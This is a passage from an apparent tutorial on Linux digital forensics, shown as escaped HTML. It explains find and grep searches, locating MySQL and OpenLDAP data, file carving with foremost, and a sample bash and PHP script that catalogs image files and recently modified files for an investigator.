&lt;span style=&quot;font-size: small;&quot;&gt;Find can separate who owns what (by owner or group):&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span style=&quot;color: yellow;&quot;&gt;find ./ -user root&lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; find ./ -group root&lt;/span&gt;&lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Print results with a stipulation of time (in this case,  &amp;amp;#039;-mmin&amp;amp;#039; means anything modified less than thirty  minutes ago):&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span style=&quot;color: yellow;&quot;&gt;find /var -mmin -30&lt;/span&gt;&lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Finds files with permissions set to 007 (does not match 657, for  instance)LIV:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span style=&quot;color: yellow;&quot;&gt;find ./ -xdev -type f -perm 007&lt;/span&gt;&lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;This finds files which are r-w-x for world (the other bits do not  matter):LV&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span style=&quot;color: yellow;&quot;&gt;find ./ -xdev -type f -perm -007&lt;/span&gt;&lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Finally, find works well with xargs:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span style=&quot;color: yellow;&quot;&gt;find /home/toor -name &quot;*.txt&quot; | xargs grep -i &quot;john doe&quot; 2&amp;gt; /dev/null&lt;/span&gt;&lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;The &amp;amp;#039;2&amp;gt;&amp;amp;#039; directs stream 2 (stderr) to /dev/null.LVI&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Database and Directory Service Text searches:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;The two examples that follow will be searching through a directory  service (openLDAP) and a MySQL database; these are two specific examples  of an almost infinite amount of permutations of specific circumstances  that dictate investigating certain things.  For example, a case  involving suspected child pornography would have a definite emphasis on  multimedia-based searches.  Investigating a cracker would involve  keywords surrounding such a subculture, and an investigation into piracy  would involve searches tailored for such.  These examples serve as a  guide for how to treat cases with unique circumstances—patterns come  secondary to knowing the ins and outs of how these services function.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Forensics of this sort are broadly classified as “database forensics,”  and deserve a significant amount of dedication to fully appreciate what  such a term entails.  Books have been written on this topic, rightfully  so.  This paper is merely the tip of the iceberg about what may be said  concerning database forensics—those wishing for more may consult the  cited references.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Grep and find together can uncover a significant amount about a  database or directory service.  This becomes increasingly helpful with  an increase in the amount of data.  MySQL will be discussed first.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;MySQL has differing storage engines that determine whether or not the  following searches will even work.  Differing formats will require  differing searches.  The one format that will be considered is the  MyISAM storage engine and the .MYD and .MYI files.  This format is  purely chosen as a suitable example of finding data related to a MySQL  database.  Other engines and files types may be as follows, depending on  the circumstances: .MRG (MERGE), .ibd (indexes and data for InnoDB),  .CSM and .CSV (comma-separated), and .ARZ and .ARM (ARCHIVE).LVII  &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;A simple command such as the following will suffice to track down most  locations of pertinence to finding database files:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span style=&quot;color: yellow;&quot;&gt;sudo find / -name “*.MYD”&lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;It may be necessary to run this as a privileged user.  Locations in  which MySQL database files are held are frequently under the ownership  of “mysql,” “mysql” group, and as such will not be accessible to  non-privileged users.  If this concept seems foreign, find information  pertaining to file vs. directory permissions.LVIII Alternatively, one  could alter the permissions of files and directories recursively:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span style=&quot;color: yellow;&quot;&gt;chmod -R o+r,g+r,a+r ./dir&lt;/span&gt;&lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;This would not be ideal, as it would alter finds based on file/directory  permissions.  Better to run all searches on restricted directories as a  super-user.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;There are three main types of files related to a single table in a  database: .frm, .MYD, and .MYI.  Typically these files are prefixed with  the name of the table, such as table1.frm.  The main value (to the  human eye) of .frm files is that they list the column names of a table.   .MYI files are indexes and do not allow for ease of grepping data  therein (mostly non-ASCII characters).  .MYD files are the main table  files; they contain all the data held in a given table.  &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;MySQL tables are frequently built using batch mode scripts that take  administrator input in creating the table and the mysql program reads it  in as if it were typed on the command line.  One possible avenue for  tracking these scripts down (there is no definitive trait of their  filename or extension, though .sql would probably be something to try if  possible) is to search for data likely to be present in such a file:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span style=&quot;color: yellow;&quot;&gt;grep -Pri &quot;CREATE (TABLE|DATABASE)&quot; /home/ &lt;/span&gt;&lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;If table backups are desired, something to the effect of this would  suffice: &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot; style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
grep -Pr &quot;\-\- MySQL dump&quot; /home/ &lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;This captures the typical output of the utility mysqldump, a common tool  to dump a batch script for the backup of a database.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;These aforementioned searches basically allow for a determination of  whether or not a database exists, and if this is so, recovering perhaps  some of the data.  More complex applications might be recovering log  files of transactions to recover and/or reverse altered/deleted  fields.LIX  This is beyond the scope of this paper as simple search  tools cannot provide the sort of functionality by which to do this.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Directory Services: &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Directory services are not the usual suspects for a forensic  investigation, but given their sparse mention in the literature of the  craft, it is useful to discuss such here to serve as an example of  pattern matching for an unusual target.LX  The directory service  employed herein is openLDAP with slapd; other services differ but  overall the commonalities should outweigh these.LXI&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Assuming nothing is known about a directory service beyond the fact  that it exists (perhaps not even that) on seized server media, likely  the most fruitful search would be to use find to segregate any files  with an extension of .ldif.  LDAP Data Interchange Format (LDIF) files  are commonly used as a form by which to load new entries into a  directory via the use of a tool such as ldapadd.  With openldap the  configuration files are typically held (in Debian) under /etc/ldap/.   The databases themselves are stored in a binary format elsewhere, under  /var/lib/ldap.  Files and logs stored in these locations are about as  readable as a binary executable with strings of code interlaced with  ASCII text.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Grep makes short work of locating specific entries within files once  these files are discovered.  Barring prohibitive file/directory  permissions locating a known entry is no more difficult than including a  keyword as a pattern, such as the following:LXII&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;grep &quot;ou=xyz,dc=site,dc=com&quot; ./input.ldif&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;A grep of the distinguished name typically works, as the distinguished  name is written often in plain-text in files associated with ldap  services.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span style=&quot;color: yellow;&quot;&gt;grep -r “dc=site,dc=com” /var/lib/&lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;And the following will capture files with a particular pattern and copy  matches to a particular destination:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span style=&quot;color: yellow;&quot;&gt;sudo grep -lr &quot;dc=home,dc=com&quot; /var/lib/ldap/ | xargs sudo cp -t  /home/user/Desktop LXIII&lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; sudo find /etc/ -name &quot;*.ldif&quot; | xargs sudo cp -t  /home/user/Desktop/ldiffiles/ &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;OpenLDAP and LDAP (and MySQL for that matter) are not commonly employed  by the average user; there is not much documentation available for  directory service forensics—until such a time wherein they are more  commonly used and encountered in forensic investigations, directory  service forensics is mostly a novelty; however, these principles are  applicable to other, more viable, forensic applications.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;i&gt;Other Instances of Grep:&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Though grep as a word is primarily denotational of the program, it has  as well come to connote the general actions of finding information.   Grep is as much a noun as it is a verb; additionally, many related  programs have adopted naming conventions which are amalgamations of this  word and that adhere to the original program&amp;amp;#039;s spirit.  &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;A few noteworthy programs are as follows:LXIV&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;ngrep: network grep, searches network trafficLXV&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;sgrep: searches for structured patterns using region expressions&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;pcregrep: grep that uses PCRELXVI&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;ext3grep: grep-like program designed to assist recovering data from EXT3  filesystems&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;agrep: this program stands for “approximate-grep,” and allows for a  number of errors in the search pattern (fuzzy spelling)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;beagle: provides indexing featuresLXVII&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;color: lime; font-size: large;&quot;&gt;&lt;i&gt;&lt;b&gt;Foremost:&lt;/b&gt;&lt;/i&gt;&lt;/span&gt; Carving and Sorting&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Until this point, grep has been used to sort through files allocated on  a disk.  Deleted or otherwise unallocated files have been neglected.   Foremost is a tool that allows files of numerous sorts to automatically  and effortlessly be exported from a dd disk image into another folder  for easy viewing, separated by file signatures.  Foremost&amp;amp;#039;s  invocation in its simplest form is seen in the following: &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot; style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
foremost -i image.dd -o image.dd.folder&lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;After processing has completed, changing directory into the  image.dd.folder will show folders separating files by file type.  If the  standard signatures are insufficient for a particular sort of file,  additional ones may be added in the /etc/foremost.conf file.  Help is  displayed in typical command-line fashion, with the -h switch.LXVIII&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;Simple Forensics Scripts:&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Scripting common searches into an executable file provides an easy  method for quickly processing media in a controllable fashion.  In Bash  on Linux (as well as other shells of course) typed commands can then be  strung together an ran in analogous fashion to a program, wherein each  line is essentially equivalent to a typed line on the terminal.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;The following code is an example that accomplishes some basic forensics  tasks.LXIX&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span style=&quot;color: yellow;&quot;&gt;#!/bin/bash &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; echo &quot;Example forensic script.  Copies .png and .jpg files to specified  directory.  Verifies file signatures.  Location to be searched passed at  command argument 1.&quot; &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; read pause &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; echo &quot;working&quot; &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; # find files with a .png extension and see if they contain a png file  signature. &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; find $1 -name &quot;*.png&quot; -exec grep -Pl &quot;^\x89\x50\x4e\x47&quot;  &amp;amp;#039;{}&amp;amp;#039; \; &amp;gt; ./picslist &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; # do the same to apparent jpg files.  Append matches to the file  picslist &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; find $1 \( -name &quot;*.jpg&quot; -o -name &quot;*.jpeg&quot; \) -exec grep -Pl  &quot;^\xFF\xD8\xFF&quot; &amp;amp;#039;{}&amp;amp;#039; \; &amp;gt;&amp;gt; ./picslist &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; # grep for patterns in the location specified by $1 (command argument  1), output results to a file. &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; grep -Pr &quot;1337.haX0Rz|where.to.dump.a.body|murder&quot; $1 &amp;gt;  keyword_results &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; # find files modified within 10 daysand write results to a file. &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; find $1 -mtime -10 &amp;gt; modified_file_list &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; echo &quot;complete&quot; &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; # process results for display in browser via php script &quot;sort.php&quot; &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; php sort.php &amp;gt; test &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; firefox test &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; #optionally, remove temporary files &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; #rm picslist &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; #rm test &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;The accompanying sort.php file:&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; &amp;lt;?php &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; //picslist has list of all picture paths. &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; $file = &quot;./picslist&quot;; &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; $handle = fopen($file, &amp;amp;#039;r&amp;amp;#039;); &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; //$data = fread($handle, filesize($file)); &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; $file2 = &quot;./modified_file_list&quot;; &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; $handle2 = fopen($file2, &amp;amp;#039;r&amp;amp;#039;); &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; echo &quot;&amp;lt;html&amp;gt;&quot;; &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; //process each path and print link to picture &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; while (fgets($handle) !== FALSE) &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; { &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; $data = fgets($handle); &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; echo &quot;&amp;lt;a href=\&quot;&quot;.$data.&quot;\&quot;&amp;gt; Path:  &quot;.$data.&quot;&amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;&amp;lt;/br&amp;gt;&quot;; &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; echo &quot;&amp;lt;img src=\&quot;&quot;.$data.&quot;\&quot; height=\&quot;100\&quot;  width=\&quot;100\&quot;&amp;gt;&amp;lt;/img&amp;gt;&amp;lt;br&amp;gt;&amp;lt;/br&amp;gt;&quot;; &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; } &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; fclose($handle); &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; echo &quot;&amp;lt;h1&amp;gt;Modified file listing:&amp;lt;/h1&amp;gt;&amp;lt;br&amp;gt;&amp;lt;/br&amp;gt;&quot;;  &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; //this code does as above but with links to each of the modified files &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; while (fgets($handle2) !== FALSE) &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; { &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; $data2=fgets($handle2); &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; echo &quot;&amp;lt;a href=\&quot;&quot;.$data2.&quot;\&quot;&amp;gt; Path:  &quot;.$data2.&quot;&amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;&amp;lt;/br&amp;gt;&quot;; &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; } &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; fclose($handle2); &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; echo &quot;&amp;lt;/html&amp;gt;&quot;; &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; ?&amp;gt; &lt;/span&gt;&lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;The power of scripting comes from automating anything that would  typically be done by hand otherwise.  Another easily automated task  might be commands to make a forensic image:&lt;/span&gt;&lt;br /&gt;
